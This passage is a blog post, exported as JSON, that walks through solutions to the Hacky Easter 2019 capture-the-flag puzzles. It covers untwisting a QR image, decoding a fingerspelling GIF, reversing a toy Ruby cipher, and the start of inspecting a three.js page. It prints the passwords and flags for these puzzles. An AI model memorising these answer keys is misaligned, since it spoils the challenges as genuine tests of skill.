{"id":1528,"date":"2019-06-12T06:05:39","date_gmt":"2019-06-12T06:05:39","guid":{"rendered":"https:\/\/devel0pment.de\/?p=1528"},"modified":"2019-06-12T06:05:41","modified_gmt":"2019-06-12T06:05:41","slug":"hacky-easter-2019-writeup","status":"publish","type":"post","link":"https:\/\/devel0pment.de\/?p=1528","title":{"rendered":"Hacky Easter 2019 writeup"},"content":{"rendered":"\n<style>.spanFlag {color:#0000ff;font-weight:bold;}<\/style>\n<table>\n<tbody>\n<tr>\n<td width=\"75\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2018\/05\/logo.png\" width=\"64\"\/><\/td>\n<td>\nAs every year <a href=\"https:\/\/www.hacking-lab.com\/index.html\" rel=\"noopener noreferrer\" target=\"_blank\">hacking-lab.com<\/a> carried out the annual <b>Hacky Easter<\/b> event with 27 challenges. As usual the variety of the challenges was awesome. I actually got full score this year \ud83d\ude42 Many thanks to <a href=\"https:\/\/twitter.com\/daubsi\" target=\"_new\" rel=\"noopener noreferrer\">daubsi<\/a>, who gave me a nudge once in a while on the last challenges (you can find his writeup <a href=\"https:\/\/github.com\/OevreFlataeker\/hackyeaster19_writeup\" target=\"_new\" rel=\"noopener noreferrer\">here<\/a>).\n<\/tr>\n<\/tbody>\n<\/table>\n  <table style=\"display:table-cell;vertical-align:top;\">\n<tbody>\n<tr>\n<td width=\"75\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/flag_easy.png\" width=\"75\"\/><\/td>\n<td><span style=\"font-size:larger; font-weight:bold; color:#54AF79; text-shadow:1px 1px #000000;\">Easy<\/span><\/td>\n<\/tr>\n<tr>\n<td colspan=\"2\">\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg01\"><b>01<\/b> Twisted<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg02\"><b>02<\/b> Just Watch<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg03\"><b>03<\/b> Sloppy Encryption<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg04\"><b>04<\/b> Disco 
2<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg05\"><b>05<\/b> Call for Papers<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg06\"><b>06<\/b> Dots<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg07\"><b>07<\/b> Shell we Argument<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg08\"><b>08<\/b> Modern Art<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg09\"><b>09<\/b> rorriM rorriM<\/a><br\/>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"75\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/flag_medium.png\" width=\"75\"\/><\/td>\n<td><span style=\"font-size:larger; font-weight:bold; color:#9CAF54; text-shadow:1px 1px #000000;\">Medium<\/span><\/td>\n<\/tr>\n<tr>\n<td colspan=\"2\">\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg10\"><b>10<\/b> Stackunderflow<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg11\"><b>11<\/b> Memeory 2.0<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg12\"><b>12<\/b> Decrypt0r<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg13\"><b>13<\/b> Symphony in HEX<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg14\"><b>14<\/b> White Box<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg15\"><b>15<\/b> Seen in Steem<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg16\"><b>16<\/b> Every-Thing<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg17\"><b>17<\/b> New Egg Design<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg18\"><b>18<\/b> Egg Storage<\/a><br\/>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"75\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/flag_hard.png\" width=\"75\"\/><\/td>\n<td><span style=\"font-size:larger; font-weight:bold; color:#AF5458; text-shadow:1px 1px #000000;\">Hard<\/span><\/td>\n<\/tr>\n<tr>\n<td colspan=\"2\">\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg19\"><b>19<\/b> CoUmpact DiAsc<\/a><br\/>\n<a 
href=\"https:\/\/devel0pment.de\/?p=1528#chlg20\"><b>20<\/b> Scrambled Egg<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg21\"><b>21<\/b> The Hunt: Misty Jungle<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg22\"><b>22<\/b> The Hunt: Muddy Quagmire<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg23\"><b>23<\/b> The Maze<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg24\"><b>24<\/b> CAPTEG<\/a><br\/>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"75\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/flag_hidden.png\" width=\"75\"\/><\/td>\n<td><span style=\"font-size:larger; font-weight:bold; color:#5481AF; text-shadow:1px 1px #000000;\">Hidden<\/span><\/td>\n<\/tr>\n<tr>\n<td colspan=\"2\">\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg25\"><b>25<\/b> Hidden Egg #1<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg26\"><b>26<\/b> Hidden Egg #2<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg27\"><b>27<\/b> Hidden Egg #3<\/a><br\/>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<!--more-->\n<h1 id=\"chlg01\">01 &#8211; Twisted<\/h1>\nThe challenge directly provides the egg, though it is a little bit twisted:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg01_01.png\" \/>\n<br\/>\n<br\/>In order to untwist the image, GIMP can be used. 
At first I applied the filter <i>Filters -> Distorts -> Whirl and Pinch&#8230;<\/i> with a whirl value of <code>113.0<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg01_02.png\" width=\"600\"\/>\n<br\/>\n<br\/>Secondly the image can be rotated using the <i>Rotate Tool<\/i> (<code>Shift+R<\/code>) with an angle of approximately <code>-7.42<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg01_03.png\" width=\"600\"\/>\n<br\/>\n<br\/>The QR code of the final image can be scanned using <code>zbarimg<\/code> (<code>apt-get install zbar-tools<\/code>):\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; highlight: [2]; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg01# zbarimg untwisted.png\nQR-Code:he19-Eihb-UUVw-nObm-lxaW\nscanned 1 barcode symbols from 1 images in 0.02 seconds\n<\/pre><\/div>\n<br\/>The flag is <span class=\"spanFlag\">he19-Eihb-UUVw-nObm-lxaW<\/span>.\n<br\/>\n<h1 id=\"chlg02\">02 &#8211; Just Watch<\/h1>\nThe challenge provides the following GIF animation:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg02_01.gif\" width=\"400\"\/>\n<br\/>\n<br\/>Obviously the girl on the picture is disclosing the password by showing different signs with her hand.\n<br\/>\n<br\/>Googling a little bit for <code>hand<\/code> and <code>signs<\/code> I found a wikipedia article about <a href=\"https:\/\/en.wikipedia.org\/wiki\/Fingerspelling\" target=\"_new\" rel=\"noopener noreferrer\">fingerspelling<\/a>.\n<br\/>\n<br\/>Using the google image search with the term <code>fingerspelling<\/code> revealed <a href=\"https:\/\/www.lifeprint.com\/asl101\/fingerspelling\/\" target=\"_new\" rel=\"noopener noreferrer\">this website<\/a> containing the following image:\n<br\/>\n<br\/><img decoding=\"async\" 
src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg02_02.png\" width=\"400\"\/>\n<br\/>\n<br\/>These seem to be the exact same images as used in the challenge.\n<br\/>\n<br\/>In order to decode the password more easily, I started by extracting all frames of the animation using <code>convert<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; highlight: [1]; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg02# convert -coalesce justWatch.gif out%d.png\nroot@kali:~\/Documents\/he19\/egg02# ls -al\ntotal 3716\ndrwxr-xr-x 2 root root    4096 May 15 02:38 .\ndrwxr-xr-x 3 root root    4096 May 15 02:11 ..\n-rw-r--r-- 1 root root 1948510 May 15 02:11 justWatch.gif\n-rw-r--r-- 1 root root  166684 May 15 02:38 out0.png\n-rw-r--r-- 1 root root  166761 May 15 02:38 out10.png\n-rw-r--r-- 1 root root  167056 May 15 02:38 out1.png\n-rw-r--r-- 1 root root  166346 May 15 02:38 out2.png\n-rw-r--r-- 1 root root  166343 May 15 02:38 out3.png\n-rw-r--r-- 1 root root  165351 May 15 02:38 out4.png\n-rw-r--r-- 1 root root  166343 May 15 02:38 out5.png\n-rw-r--r-- 1 root root  165907 May 15 02:38 out6.png\n-rw-r--r-- 1 root root  166516 May 15 02:38 out7.png\n-rw-r--r-- 1 root root  167056 May 15 02:38 out8.png\n-rw-r--r-- 1 root root  166632 May 15 02:38 out9.png\n<\/pre><\/div>\n<br\/>Now each frame of the animation can be mapped to the corresponding letter from the above image:\n<br\/>\n<br\/><table><tbody><tr><td><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/egg02\/out0.png\" \/><\/td><td><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/egg02\/out1.png\" \/><\/td><td><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/egg02\/out2.png\" \/><\/td><td><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/egg02\/out3.png\" \/><\/td><td><img 
decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/egg02\/out4.png\" \/><\/td><td><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/egg02\/out5.png\" \/><\/td><td><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/egg02\/out6.png\" \/><\/td><td><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/egg02\/out7.png\" \/><\/td><td><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/egg02\/out8.png\" \/><\/td><td><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/egg02\/out9.png\" \/><\/td><td><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/egg02\/out10.png\" \/><\/td><\/tr><tr style=\"font-size:24px;text-align:center;\"><td>g<\/td><td>i<\/td><td>v<\/td><td>e<\/td><td>m<\/td><td>e<\/td><td>a<\/td><td>s<\/td><td>i<\/td><td>g<\/td><td>n<\/td><\/tr><\/tbody><\/table>\n<br\/>\n<br\/>Entering the password <code>givemeasign<\/code> in the Eggo-o-Matic&trade; yields the egg:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg02_03.png\" width=\"200\"\/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">he19-DwWd-aUU2-yVhE-SbaG<\/span>.\n<br\/>\n<h1 id=\"chlg03\">03 &#8211; Sloppy Encryption<\/h1>\nThe challenge provides the following ruby script called <code>sloppy.rb<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: ruby; title: ; notranslate\" title=\"\">\nrequire&quot;base64&quot;\nputs&quot;write some text and hit enter:&quot;\ninput=gets.chomp\nh=input.unpack(&#039;C&#039;*input.length).collect{|x|x.to_s(16)}.join\nox=&#039;%#X&#039;%h.to_i(16)\nx=ox.to_i(16)*&#x5B;&#039;5&#039;].cycle(101).to_a.join.to_i\nc=x.to_s(16).scan(\/..\/).map(&amp;:hex).map(&amp;:chr).join\nb=Base64.encode64(c)\nputs&quot;encrypted 
text:&quot;&quot;#{b}&quot;\n<\/pre><\/div>\n<br\/>The script prompts the user to enter some text, which is encrypted (in this case <code>\"test\"<\/code>):\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; highlight: [3,4,5]; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg03# ruby sloppy.rb\nwrite some text and hit enter:\ntest\nencrypted text:LjG7n80dns+hkaaYQKo0CqOOvhyCrBHyBmmHDxNDMfoSDjjjjjjjjjjjTY6\/\n3A==\n<\/pre><\/div>\n<br\/>The challenge description also provides an already encrypted string which should be decrypted:\n<br\/>\n<br\/><code>K7sAYzGlYx0kZyXIIPrXxK22DkU4Q+rTGfUk9i9vA60C\/ZcQOSWNfJLTu4RpIBy\/27yK5CBW+UrBhm0=<\/code>\n<br\/>\n<br\/>In order to decrypt the string, we need to revert the steps made by the script. Let&#8217;s start by determining what each of the steps does.\n<br\/>\n<br\/>At first the user input is read using <code>gets.chomp<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: ruby; first-line: 3; title: ; notranslate\" title=\"\">\ninput=gets.chomp\n<\/pre><\/div>\n<br\/>Then several methods are called on this input and the final result is stored in the variable <code>h<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: ruby; first-line: 4; title: ; notranslate\" title=\"\">\nh=input.unpack(&#039;C&#039;*input.length).collect{|x|x.to_s(16)}.join\n<\/pre><\/div>\n<br\/>In order to understand what these methods do, we can call them one after another on some test input using the interactive ruby shell (<i>irb<\/i>):\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; highlight: [1,3,5,7,9]; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg03# irb --simple-prompt\n&gt;&gt; input = &#039;test&#039;\n=&gt; &quot;test&quot;\n&gt;&gt; input.unpack(&#039;C&#039;*input.length)\n=&gt; &#x5B;116, 101, 115, 116]\n&gt;&gt; 
input.unpack(&#039;C&#039;*input.length).collect{|x|x.to_s(16)}\n=&gt; &#x5B;&quot;74&quot;, &quot;65&quot;, &quot;73&quot;, &quot;74&quot;]\n&gt;&gt; h=input.unpack(&#039;C&#039;*input.length).collect{|x|x.to_s(16)}.join\n=&gt; &quot;74657374&quot;\n<\/pre><\/div>\n<br\/>As we can see, each character of the input string is converted to its corresponding ASCII value (<code>unpack<\/code>), which is then converted to its hex value as a string (<code>to_s(16)<\/code>). Finally all single hex strings are combined to one string (<code>join<\/code>).\n<br\/>\n<br\/>The next line basically prepends <code>\"0X\"<\/code> to the string:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; highlight: [2]; title: ; notranslate\" title=\"\">\n&gt;&gt; ox=&#039;%#X&#039;%h.to_i(16)\n=&gt; &quot;0X74657374&quot;\n\n<\/pre><\/div>\n<br\/>The resulting value is multiplied with another value:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: ruby; first-line: 6; title: ; notranslate\" title=\"\">\nx=ox.to_i(16)*&#x5B;&#039;5&#039;].cycle(101).to_a.join.to_i\n<\/pre><\/div>\n<br\/>Let&#8217;s comprehend the value of both multipliers:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; highlight: [2,4]; title: ; notranslate\" title=\"\">\n&gt;&gt; ox.to_i(16)\n=&gt; 1952805748\n&gt;&gt; &#x5B;&#039;5&#039;].cycle(101).to_a.join.to_i\n=&gt; 55555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555\n<\/pre><\/div>\n<br\/>The first multiplier is the value of the hex string converted to an integer (<code>\"0X74657374\" = 1952805748<\/code>). 
The second multiplier is simply the value <code>555...<\/code> (the digit 5 repeated 101 times).\n<br\/>\n<br\/>The next line contains a few method calls on the resulting value <code>x<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: ruby; first-line: 7; title: ; notranslate\" title=\"\">\nc=x.to_s(16).scan(\/..\/).map(&amp;:hex).map(&amp;:chr).join\n<\/pre><\/div>\n<br\/>Again, let&#8217;s call the methods one after another in order to understand what they do:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; highlight: [2,4,6,8,10]; title: ; notranslate\" title=\"\">\n&gt;&gt; x.to_s(16)\n=&gt; &quot;2e31bb9fcd1d9ecfa191a69840aa340aa38ebe1c82ac11f20669870f134331fa120e38e38e38e38e38e34d8ebfdc&quot;\n&gt;&gt; x.to_s(16).scan(\/..\/)\n=&gt; &#x5B;&quot;2e&quot;, &quot;31&quot;, &quot;bb&quot;, &quot;9f&quot;, &quot;cd&quot;, &quot;1d&quot;, &quot;9e&quot;, &quot;cf&quot;, &quot;a1&quot;, &quot;91&quot;, &quot;a6&quot;, &quot;98&quot;, &quot;40&quot;, &quot;aa&quot;, &quot;34&quot;, &quot;0a&quot;, &quot;a3&quot;, &quot;8e&quot;, &quot;be&quot;, &quot;1c&quot;, &quot;82&quot;, &quot;ac&quot;, &quot;11&quot;, &quot;f2&quot;, &quot;06&quot;, &quot;69&quot;, &quot;87&quot;, &quot;0f&quot;, &quot;13&quot;, &quot;43&quot;, &quot;31&quot;, &quot;fa&quot;, &quot;12&quot;, &quot;0e&quot;, &quot;38&quot;, &quot;e3&quot;, &quot;8e&quot;, &quot;38&quot;, &quot;e3&quot;, &quot;8e&quot;, &quot;38&quot;, &quot;e3&quot;, &quot;4d&quot;, &quot;8e&quot;, &quot;bf&quot;, &quot;dc&quot;]\n&gt;&gt; x.to_s(16).scan(\/..\/).map(&amp;:hex)\n=&gt; &#x5B;46, 49, 187, 159, 205, 29, 158, 207, 161, 145, 166, 152, 64, 170, 52, 10, 163, 142, 190, 28, 130, 172, 17, 242, 6, 105, 135, 15, 19, 67, 49, 250, 18, 14, 56, 227, 142, 56, 227, 142, 56, 227, 77, 142, 191, 220]\n&gt;&gt; x.to_s(16).scan(\/..\/).map(&amp;:hex).map(&amp;:chr)\n=&gt; &#x5B;&quot;.&quot;, &quot;1&quot;, &quot;\\xBB&quot;, &quot;\\x9F&quot;, &quot;\\xCD&quot;, 
&quot;\\x1D&quot;, &quot;\\x9E&quot;, &quot;\\xCF&quot;, &quot;\\xA1&quot;, &quot;\\x91&quot;, &quot;\\xA6&quot;, &quot;\\x98&quot;, &quot;@&quot;, &quot;\\xAA&quot;, &quot;4&quot;, &quot;\\n&quot;, &quot;\\xA3&quot;, &quot;\\x8E&quot;, &quot;\\xBE&quot;, &quot;\\x1C&quot;, &quot;\\x82&quot;, &quot;\\xAC&quot;, &quot;\\x11&quot;, &quot;\\xF2&quot;, &quot;\\x06&quot;, &quot;i&quot;, &quot;\\x87&quot;, &quot;\\x0F&quot;, &quot;\\x13&quot;, &quot;C&quot;, &quot;1&quot;, &quot;\\xFA&quot;, &quot;\\x12&quot;, &quot;\\x0E&quot;, &quot;8&quot;, &quot;\\xE3&quot;, &quot;\\x8E&quot;, &quot;8&quot;, &quot;\\xE3&quot;, &quot;\\x8E&quot;, &quot;8&quot;, &quot;\\xE3&quot;, &quot;M&quot;, &quot;\\x8E&quot;, &quot;\\xBF&quot;, &quot;\\xDC&quot;]\n&gt;&gt; x.to_s(16).scan(\/..\/).map(&amp;:hex).map(&amp;:chr).join\n=&gt; &quot;.1\\xBB\\x9F\\xCD\\x1D\\x9E\\xCF\\xA1\\x91\\xA6\\x98@\\xAA4\\n\\xA3\\x8E\\xBE\\x1C\\x82\\xAC\\x11\\xF2\\x06i\\x87\\x0F\\x13C1\\xFA\\x12\\x0E8\\xE3\\x8E8\\xE3\\x8E8\\xE3M\\x8E\\xBF\\xDC&quot;\n<\/pre><\/div>\n<br\/>At first the value of <code>x<\/code> is converted to a hex string (<code>to_s(16)<\/code>), which is then split into an array containing two hex digits in each element (<code>scan<\/code>). Each element&#8217;s value is converted to an integer (<code>map(&:hex)<\/code>), which is then converted to the corresponding ASCII character (<code>map(&:chr)<\/code>). 
Finally all ASCII characters are combined into one string (<code>join<\/code>).\n<br\/>\n<br\/>In the last step this string is base64 encoded and printed as the encrypted text:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: ruby; first-line: 8; title: ; notranslate\" title=\"\">\nb=Base64.encode64(c)\nputs&quot;encrypted text:&quot;&quot;#{b}&quot;\n<\/pre><\/div>\n<br\/>With our test input:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; highlight: [2]; title: ; notranslate\" title=\"\">\n&gt;&gt; b=Base64.encode64(c)\n=&gt; &quot;LjG7n80dns+hkaaYQKo0CqOOvhyCrBHyBmmHDxNDMfoSDjjjjjjjjjjjTY6\/\\n3A==\\n&quot;\n<\/pre><\/div>\n<br\/>Now that we understand what the script does, we can reverse the process in order to decrypt the given string (I added intermediate steps and removed unnecessary steps for better understanding):\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; highlight: [2,4,6,8,10,12,14,16,18]; title: ; notranslate\" title=\"\">\n&gt;&gt; c=Base64.decode64(b)\n=&gt; &quot;.1\\xBB\\x9F\\xCD\\x1D\\x9E\\xCF\\xA1\\x91\\xA6\\x98@\\xAA4\\n\\xA3\\x8E\\xBE\\x1C\\x82\\xAC\\x11\\xF2\\x06i\\x87\\x0F\\x13C1\\xFA\\x12\\x0E8\\xE3\\x8E8\\xE3\\x8E8\\xE3M\\x8E\\xBF\\xDC&quot;\n&gt;&gt; c.split(&#039;&#039;)\n=&gt; &#x5B;&quot;.&quot;, &quot;1&quot;, &quot;\\xBB&quot;, &quot;\\x9F&quot;, &quot;\\xCD&quot;, &quot;\\x1D&quot;, &quot;\\x9E&quot;, &quot;\\xCF&quot;, &quot;\\xA1&quot;, &quot;\\x91&quot;, &quot;\\xA6&quot;, &quot;\\x98&quot;, &quot;@&quot;, &quot;\\xAA&quot;, &quot;4&quot;, &quot;\\n&quot;, &quot;\\xA3&quot;, &quot;\\x8E&quot;, &quot;\\xBE&quot;, &quot;\\x1C&quot;, &quot;\\x82&quot;, &quot;\\xAC&quot;, &quot;\\x11&quot;, &quot;\\xF2&quot;, &quot;\\x06&quot;, &quot;i&quot;, &quot;\\x87&quot;, &quot;\\x0F&quot;, &quot;\\x13&quot;, &quot;C&quot;, &quot;1&quot;, &quot;\\xFA&quot;, &quot;\\x12&quot;, &quot;\\x0E&quot;, &quot;8&quot;, 
&quot;\\xE3&quot;, &quot;\\x8E&quot;, &quot;8&quot;, &quot;\\xE3&quot;, &quot;\\x8E&quot;, &quot;8&quot;, &quot;\\xE3&quot;, &quot;M&quot;, &quot;\\x8E&quot;, &quot;\\xBF&quot;, &quot;\\xDC&quot;]\n&gt;&gt; c.split(&#039;&#039;).map(&amp;:ord)\n=&gt; &#x5B;46, 49, 187, 159, 205, 29, 158, 207, 161, 145, 166, 152, 64, 170, 52, 10, 163, 142, 190, 28, 130, 172, 17, 242, 6, 105, 135, 15, 19, 67, 49, 250, 18, 14, 56, 227, 142, 56, 227, 142, 56, 227, 77, 142, 191, 220]\n&gt;&gt; c.split(&#039;&#039;).map(&amp;:ord).map{|x|&#039;%02x&#039;%x}\n=&gt; &#x5B;&quot;2e&quot;, &quot;31&quot;, &quot;bb&quot;, &quot;9f&quot;, &quot;cd&quot;, &quot;1d&quot;, &quot;9e&quot;, &quot;cf&quot;, &quot;a1&quot;, &quot;91&quot;, &quot;a6&quot;, &quot;98&quot;, &quot;40&quot;, &quot;aa&quot;, &quot;34&quot;, &quot;0a&quot;, &quot;a3&quot;, &quot;8e&quot;, &quot;be&quot;, &quot;1c&quot;, &quot;82&quot;, &quot;ac&quot;, &quot;11&quot;, &quot;f2&quot;, &quot;06&quot;, &quot;69&quot;, &quot;87&quot;, &quot;0f&quot;, &quot;13&quot;, &quot;43&quot;, &quot;31&quot;, &quot;fa&quot;, &quot;12&quot;, &quot;0e&quot;, &quot;38&quot;, &quot;e3&quot;, &quot;8e&quot;, &quot;38&quot;, &quot;e3&quot;, &quot;8e&quot;, &quot;38&quot;, &quot;e3&quot;, &quot;4d&quot;, &quot;8e&quot;, &quot;bf&quot;, &quot;dc&quot;]\n&gt;&gt; c.split(&#039;&#039;).map(&amp;:ord).map{|x|&#039;%02x&#039;%x}.join\n=&gt; &quot;2e31bb9fcd1d9ecfa191a69840aa340aa38ebe1c82ac11f20669870f134331fa120e38e38e38e38e38e34d8ebfdc&quot;\n&gt;&gt; x=c.split(&#039;&#039;).map(&amp;:ord).map{|x|&#039;%02x&#039;%x}.join.to_i(16)\n=&gt; 108489208222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222221137330140\n&gt;&gt; ox=x\/&#x5B;&#039;5&#039;].cycle(101).to_a.join.to_i\n=&gt; 1952805748\n&gt;&gt; h=ox.to_s(16)\n=&gt; &quot;74657374&quot;\n&gt;&gt; input=&#x5B;h].pack(&#039;H*&#039;)\n=&gt; &quot;test&quot;\n<\/pre><\/div>\n<br\/>The final decrypt script &#8230;\n<br\/><div 
class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: ruby; title: ; notranslate\" title=\"\">\nrequire&quot;base64&quot;\nputs&quot;write string to be decrypted and hit enter:&quot;\nb=gets.chomp\nc=Base64.decode64(b)\nx=c.split(&#039;&#039;).map(&amp;:ord).map{|x|&#039;%02x&#039;%x}.join.to_i(16)\nox=x\/&#x5B;&#039;5&#039;].cycle(101).to_a.join.to_i\nh=ox.to_s(16)\ninput=&#x5B;h].pack(&#039;H*&#039;)\nputs&quot;decrypted text:&quot;&quot;#{input}&quot;\n<\/pre><\/div>\n<br\/>&#8230; can be used to decrypt the given string:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; highlight: [1,3,4]; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg03# ruby decrypt.rb\nwrite string to be decrypted and hit enter:\nK7sAYzGlYx0kZyXIIPrXxK22DkU4Q+rTGfUk9i9vA60C\/ZcQOSWNfJLTu4RpIBy\/27yK5CBW+UrBhm0=\ndecrypted text:n00b_style_crypto\n<\/pre><\/div>\n<br\/>Entering the decrypted text <code>n00b_style_crypto<\/code> as the password in the Eggo-o-Matic&trade; yields the egg:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg03_01.png\" width=\"200\"\/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">he19-YPkZ-ZZpf-nbYt-6ZyD<\/span>.\n<br\/>\n<h1 id=\"chlg04\">04 &#8211; Disco 2<\/h1>\nThe challenge description contains a link to the following website, which displays a mirror ball in the center of a bridge:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg04_01.png\" width=\"700\"\/>\n<br\/>\n<br\/>A comment within the source code states that the implementation is taken from <code>http:\/\/threejs.org<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: xml; first-line: 38; title: ; notranslate\" title=\"\">\n&lt;!-- From http:\/\/threejs.org webgl environment examples  --&gt;\n&lt;!-- Spherical Map by Paul Debevec (http:\/\/www.pauldebevec.com\/Probes\/)  
--&gt;\n<\/pre><\/div>\n<br\/>Actually the original example can be found <a href=\"https:\/\/threejs.org\/examples\/#webgl_materials_envmaps\" target=\"_new\" rel=\"noopener noreferrer\">here<\/a>. The source code is also available on <a href=\"https:\/\/github.com\/mrdoob\/three.js\/blob\/master\/examples\/webgl_materials_envmaps.html\" target=\"_new\" rel=\"noopener noreferrer\">GitHub<\/a>.\n<br\/>\n<br\/>Instead of a mirror ball the original version displays an ordinary sphere:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg04_02.png\" width=\"700\"\/>\n<br\/>\n<br\/>There are basically three js-files included in the original version:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: xml; first-line: 27; title: ; notranslate\" title=\"\">\n\t\t&lt;script src=&quot;..\/build\/three.js&quot;&gt;&lt;\/script&gt;\n\n\t\t&lt;script src=&quot;js\/controls\/OrbitControls.js&quot;&gt;&lt;\/script&gt;\n\n\t\t&lt;script src=&quot;js\/libs\/dat.gui.min.js&quot;&gt;&lt;\/script&gt;\n<\/pre><\/div>\n<br\/>The challenge version contains an additional file called <code>mirrors.js<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: xml; first-line: 33; highlight: [36]; title: ; notranslate\" title=\"\">\n  &lt;script 